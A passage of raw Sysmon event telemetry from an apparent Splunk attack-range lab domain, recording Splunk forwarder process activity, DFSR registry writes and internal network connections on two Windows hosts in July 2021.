AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57150-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:49.536{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9131F5B7319B6E2979A7B16D2A2ACDC6,SHA256=8BB0A45D6B362E1E197C91DE3AE9285EE4A73EFD4D96602B870C7ACD34AB4CFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:49.028{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87E8D6A35C79A165918410427F8E9447,SHA256=31D57C8EC53D8DBCB33F1D95AB1D3C9F0E51FF938E03C78A3FAEDD288008C495,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001045856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:50.866{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001045855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:50.866{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001045854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:50.866{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 10341000x80000000000000001045853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B6-60EB-E77C-00000000CF01}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2B6-60EB-E77C-00000000CF01}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.835{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B6-60EB-E77C-00000000CF01}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.836{466BC892-F2B6-60EB-E77C-00000000CF01}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.566{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD91BCF0D8DD72C4800AF155F2F9B3B,SHA256=5ABCB6271580CDA110B9B288E13672BAF050460EEEC024664013BD42703A43E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:50.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=548BCFBE6A609715F1F1AF972A56C0AB,SHA256=7B529115423F1A475CFC4726A393674A03E8EC1E12A50C03798CD2308DC6D0F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.367{466BC892-F2B6-60EB-E67C-00000000CF01}98884212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B6-60EB-E67C-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2B6-60EB-E67C-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B6-60EB-E67C-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.152{466BC892-F2B6-60EB-E67C-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001045835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:41.594{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50896-false10.0.1.12-8000- 354300x80000000000000001045869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.409{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50897-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001045868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.408{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50897-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 10341000x80000000000000001045867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.735{466BC892-F2B7-60EB-E87C-00000000CF01}65044136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.567{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABADA92348ED8C99392F85336B493BC3,SHA256=82AC2930D9E1F3E9F8F42BBDE23DC20760BB82BCB50B701232B234B331370FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:51.059{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AB1412BE5079D5E36E7288A7F4DFE0E,SHA256=8ACBBE561FEAD60DB4245CF79B73A0485C62E9DF4CDB477272674FCA42A437D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.536{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B7-60EB-E87C-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.520{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.520{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.520{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 